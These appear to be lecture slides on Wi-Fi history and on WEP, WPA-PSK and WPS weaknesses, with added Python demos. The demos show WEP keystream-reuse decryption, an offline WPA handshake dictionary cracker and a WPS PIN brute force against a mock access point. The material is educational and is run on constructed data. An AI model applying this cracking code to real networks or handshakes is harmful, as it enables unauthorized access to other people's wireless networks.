802.11 wireless, wep, wpa lecture
Wi-Fi presentation for 2014-03-31
802.11
Wireless, WEP and WPA
History
ALOHAnet - Hawaii
https://www.lib.utexas.edu/maps/us_2001/hawaii_ref_2001.jpg
ALOHAnet
June 1971
Version 1
Pure ALOHA
data.send()
while network.collision():       # keep retrying until the frame gets through
    wait(time=random())          # back off for a random interval before resending
    data.send()
Pure ALOHA
http://upload.wikimedia.org/wikipedia/commons/thumb/3/35/Pure_ALOHA1.svg/800px-Pure_ALOHA1.svg.png
Pure ALOHA: only 18.4% (1/2e) of transmission time is used for
successful frame transmissions, which motivated slotted ALOHA
Version 2
Slotted ALOHA
Uses discrete time slots
A station can only send at the beginning of a
time slot
So all collisions happen at the beginning of a frame
(colliding frames overlap completely, halving the vulnerable period)
Slotted ALOHA
http://upload.wikimedia.org/wikipedia/commons/thumb/7/7a/Slotted_ALOHA.svg/800px-Slotted_ALOHA.svg.png
Slotted ALOHA
Low-data-rate tactical satellite comms by
military
Subscriber based satellite comms networks
Mobile telephony call setup
Set top box comms
RFID
36.8% (1/e) of transmission time used for
successful frame transmissions
Wireless
Standard   Range   Max. speed                 Frequency         Year of release
Legacy     100 m   2 Mbit/s                   2.4 GHz           1997
802.11a    120 m   54 Mbit/s                  5 GHz             1999
802.11b    140 m   11 Mbit/s                  2.4 GHz           1999
802.11g    140 m   54 Mbit/s                  2.4 GHz           2003
802.11n    250 m   150 Mbit/s (per stream)    2.4 GHz + 5 GHz   2009
802.11ac   -       866.7 Mbit/s (per stream)  5 GHz             2013
Channels
http://en.wikipedia.org/wiki/File:2.4_GHz_Wi-Fi_channels_(802.11b,g_WLAN).svg
1-11 – Anywhere
12&13 – Anywhere except USA
14 – Japan only
WEP
Only used by legacy equipment now
Neil still uses this at his home but shhhhh.
Very broken
WEP
How is a WEP connection made? (shared-key authentication)
Probe request Client >>> AP
Probe response AP >>> Client
Authentication request Client >>> AP
Challenge (128 bytes of plaintext) AP >>> Client
Challenge response (the challenge RC4-encrypted with the WEP key, which hands a sniffer 128 bytes of keystream) Client >>> AP
Association request Client >>> AP
Association response AP >>> Client
How it works
24-bit IV (initialisation vector) || secret key (40-bit or 104-bit) = 64-bit or 128-bit RC4 seed
RC4 PRNG -> key stream
Plaintext message (+ CRC-32 ICV) XOR key stream -> ciphertext
Sent on the air: IV (in the clear) || ciphertext
Why is that broken?
• Only 2^24 (about 16.7 million) possible IVs, and the IV is sent in the clear with every frame
• On an 11 Mbit/s link with 1500-byte frames, all possible IVs are exhausted in ~5 hours; by the birthday bound a repeat is already likely after ~5,000 frames
• Every repeated IV reuses a keystream: XOR of the two ciphertexts is the XOR of the two plaintexts, and one known plaintext (LLC/SNAP headers, ARP, DHCP) gives the whole keystream for that IV
• With enough (IV, keystream) pairs, statistical attacks on RC4 (FMS, PTW) recover the secret key itself
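As an added example (not part of the original slides), the following Python reproduces the keystream-reuse argument above end to end: a toy WEP encryptor built on RC4, two constructed frames sent under the same IV and key, recovery of the keystream from the one whose plaintext is guessable, and decryption of the other without ever learning the key. The key, IV and frame contents are constructed for the demonstration; the two helper functions at the end compute the birthday bound and the exhaustion time quoted on the slide.

```python
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA: return `length` keystream bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (in the clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(secret_key) in (5, 13)   # 24-bit IV, 40- or 104-bit key
    payload = plaintext + icv(plaintext)
    return iv + xor(payload, rc4_keystream(iv + secret_key, len(payload)))


def recover_keystream(frame: bytes, known_payload: bytes) -> tuple:
    """Known plaintext (+ICV) XOR ciphertext gives the keystream for that frame's IV."""
    return frame[:3], xor(frame[3:], known_payload)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Strip the IV and XOR the keystream back out; no key needed."""
    return xor(frame[3:], keystream)


def keystream_reuse_demo() -> dict:
    """Constructed scenario: two frames sent under the same IV and the same WEP key."""
    key = bytes.fromhex("0badc0ffee")     # constructed 40-bit key; the attacker never learns it
    iv = bytes.fromhex("0c0ffe")          # an IV the sender happens to reuse
    snap = bytes.fromhex("aaaa03000000")  # LLC/SNAP header that every 802.11 data frame starts with
    # Frame 1: an ARP request; header and length are predictable, so its plaintext is known.
    known = snap + bytes.fromhex("0806") + bytes.fromhex("0001080006040001") + bytes(20)
    # Frame 2: an IP frame whose contents the attacker wants (constructed).
    secret = snap + bytes.fromhex("0800") + b"GET /admin HTTP/1.1"
    frame_known = wep_encrypt(key, iv, known)
    frame_secret = wep_encrypt(key, iv, secret)
    # The IV collision is visible on the wire, and the key cancels out of the XOR.
    assert frame_known[:3] == frame_secret[:3]
    assert xor(frame_known[3:], frame_secret[3:]) == xor(known + icv(known), secret + icv(secret))
    # One known plaintext gives the keystream for this IV ...
    seen_iv, ks = recover_keystream(frame_known, known + icv(known))
    # ... which decrypts any other frame sent under the same IV (the 4-byte ICV is dropped).
    recovered = decrypt_with_keystream(frame_secret, ks)[:-4]
    return {"iv": seen_iv.hex(), "keystream_bytes": len(ks), "recovered": recovered}


def frames_for_50pct_iv_collision(iv_bits: int = 24) -> int:
    """Birthday bound: about sqrt(2 * N * ln 2) frames before some IV repeats with p = 0.5."""
    return round(math.sqrt(2 * (2 ** iv_bits) * math.log(2)))


def hours_to_exhaust_ivs(bitrate_bps: float = 11e6, frame_bytes: int = 1500, iv_bits: int = 24) -> float:
    """Time for a saturated link to cycle through every IV once."""
    frames_per_second = bitrate_bps / (frame_bytes * 8)
    return (2 ** iv_bits) / frames_per_second / 3600
```

The second assertion inside `keystream_reuse_demo` is the whole point of the slide: once two frames share an IV, the secret key drops out of the XOR of their ciphertexts, and nothing about the key's length (40 or 104 bits) helps.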
WPA
• Replaced WEP
• Comes in 2 types, WPA and WPA2
• Each type has 2 flavours
– PSK (personal)
– Enterprise (802.1X + RADIUS)
• WPA had to run on the same hardware as
WEP (firmware updates only), so it kept RC4
• Used TKIP: per-packet RC4 keys, a 48-bit sequence counter and the Michael MIC
WEP vs. WPA
WEP: static keys (the same key used at every session start)
WPA: dynamic session keys (a fresh key derived at every session start)
WPA - PSK
Probe request Client >>> AP
Probe response AP >>> Client
Authentication request / response (open system, no challenge)
Association request / response
4-way handshake:
1. ANonce AP >>> Client
2. SNonce + MIC Client >>> AP
3. GTK + MIC AP >>> Client
4. ACK + MIC Client >>> AP
To Wireshark
CAPTURE FILE
The bigger picture
Passphrase (8-63 chars) + SSID
-> PBKDF2 (HMAC-SHA1, 4096 iterations)
-> Pre-shared key (256-bit)
Pre-shared key + ANonce + SNonce + AP MAC + Client MAC
-> 4-way handshake
-> PTK (pairwise transient key, unique to session)
Attacker's side: guess a passphrase (8-63 chars), derive the PSK and then the PTK from the captured nonces and MACs,
verify the guess using the captured MIC
Crackable?
Yes
BUT
Takes forever: it is an offline dictionary attack, and every guess costs a full PBKDF2 (4096 HMAC-SHA1 rounds), so only weak passphrases fall
Really need to be desperate
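As an added example (not from the original slides), the following Python implements the bigger-picture derivation and the offline check it enables: passphrase plus SSID to PSK with PBKDF2, PSK plus both MACs and both nonces to PTK with the 802.11i PRF, and the MIC over the EAPOL-Key frame that lets a captured handshake verify each guess. The capture is constructed inside `make_capture` (fixed MACs and nonces, and a placeholder byte string standing in for message 2 with its MIC field zeroed, not a real EAPOL-Key layout); the PSK test vector for "password"/"IEEE" is the one given in IEEE 802.11i.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def psk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes, nbytes: int = 48) -> bytes:
    """PTK from the PMK (= PSK here) plus both MACs and both nonces, so it is unique per session.
    48 bytes is the CCMP (WPA2) PTK; TKIP (WPA) uses 64. The KCK is the first 16 bytes either way."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits."""
    if version == 1:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for what a sniffer sees: both MACs, both nonces, message 2 and its MIC."""
    ap_mac = bytes.fromhex("00112233aabb")        # constructed
    client_mac = bytes.fromhex("66778899ccdd")    # constructed
    anonce = bytes(range(32))                     # fixed nonces so the example is deterministic
    snonce = bytes(range(32, 64))
    # Placeholder for EAPOL-Key message 2 with the 16-byte MIC field zeroed (constructed bytes,
    # not a real frame layout); this is the form cracking tools store alongside the MIC.
    eapol_zeroed = b"EAPOL-Key message 2, MIC field zeroed (constructed)"
    ptk = derive_ptk(psk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    kck = ptk[:16]                                # key confirmation key signs the handshake messages
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac, "anonce": anonce,
            "snonce": snonce, "eapol_zeroed": eapol_zeroed, "version": 2,
            "mic": eapol_mic(kck, eapol_zeroed, 2)}


def crack(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: every guess costs one PBKDF2 (4096 HMAC-SHA1 rounds)
    plus a cheap PTK derivation and MIC comparison. Returns the passphrase or None."""
    for guess in wordlist:
        pmk = psk_from_passphrase(guess, capture["ssid"])
        ptk = derive_ptk(pmk, capture["ap_mac"], capture["client_mac"],
                         capture["anonce"], capture["snonce"])
        candidate_mic = eapol_mic(ptk[:16], capture["eapol_zeroed"], capture["version"])
        if hmac.compare_digest(candidate_mic, capture["mic"]):
            return guess
    return None
```

Nothing in `crack` talks to the access point: everything it needs (SSID, both MACs, both nonces, one MIC-protected message) is in the first two handshake frames, which is why the PBKDF2 iteration count, and not the radio, is the only thing slowing the attacker down.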
But there is one major flaw
WiFi Protected Setup
Security vs. ease of use vs. functionality (trade-off triangle)
WPS
• Simplifies WPA security for users
• Gives us a better way in ;)
• The 8-digit PIN is checked in 2 halves of 4 digits, and the last digit is only a checksum
• The router tells the client whether the first half is correct before the second half is even checked
• So, we have a lot fewer possibilities: 10^4 + 10^3 = 11,000 guesses instead of 10^8
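As an added example (not from the original slides), the following Python shows why the WPS split check collapses the PIN space: the checksum digit from the WPS specification, the three search-space sizes, and an online brute force against a constructed `AccessPoint` class that stands in for the registrar and answers each half separately, the way a real AP leaks the result at messages M4 and M6. The PIN 12345670 is a valid PIN under the checksum rule; the access-point class and its attempt counter are constructed for the demonstration.

```python
from typing import Optional


def wps_checksum(first7: int) -> int:
    """Checksum digit over the first seven PIN digits (algorithm from the WPS specification)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """An 8-digit PIN is valid when its last digit matches the checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def search_space() -> tuple:
    """(8 arbitrary digits, 7 free digits + checksum, first half then 3 free digits of second half)."""
    return 10 ** 8, 10 ** 7, 10 ** 4 + 10 ** 3


class AccessPoint:
    """Constructed stand-in for the registrar side of the WPS protocol.
    A wrong first half is rejected at M4 and a wrong second half at M6, so each
    check below answers for one half only, exactly the leak the slide describes."""

    def __init__(self, pin: str):
        assert is_valid_pin(pin)
        self._pin = pin
        self.attempts = 0           # how many protocol runs the attacker needed

    def check_first_half(self, half: str) -> bool:
        self.attempts += 1
        return half == self._pin[:4]

    def check_second_half(self, first: str, second: str) -> bool:
        self.attempts += 1
        return first == self._pin[:4] and second == self._pin[4:]


def brute_force(ap: AccessPoint) -> Optional[str]:
    """Online attack: confirm the first half (<= 10^4 tries), then the second (<= 10^3 tries)."""
    first = None
    for i in range(10 ** 4):
        candidate = f"{i:04d}"
        if ap.check_first_half(candidate):
            first = candidate
            break
    if first is None:
        return None
    for j in range(10 ** 3):
        three = f"{j:03d}"
        # Only 3 digits are free; the 8th is forced by the checksum, so it is never guessed.
        second = three + str(wps_checksum(int(first + three)))
        if ap.check_second_half(first, second):
            return first + second
    return None
```

The attempt counter is the practical takeaway: the worst case is 11,000 protocol runs, and in the example below the PIN falls in well under 2,000, which is why a router that does not lock out after a handful of failed WPS attempts gives the WPA passphrase away regardless of how strong that passphrase is.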
Finally WPA-Enterprise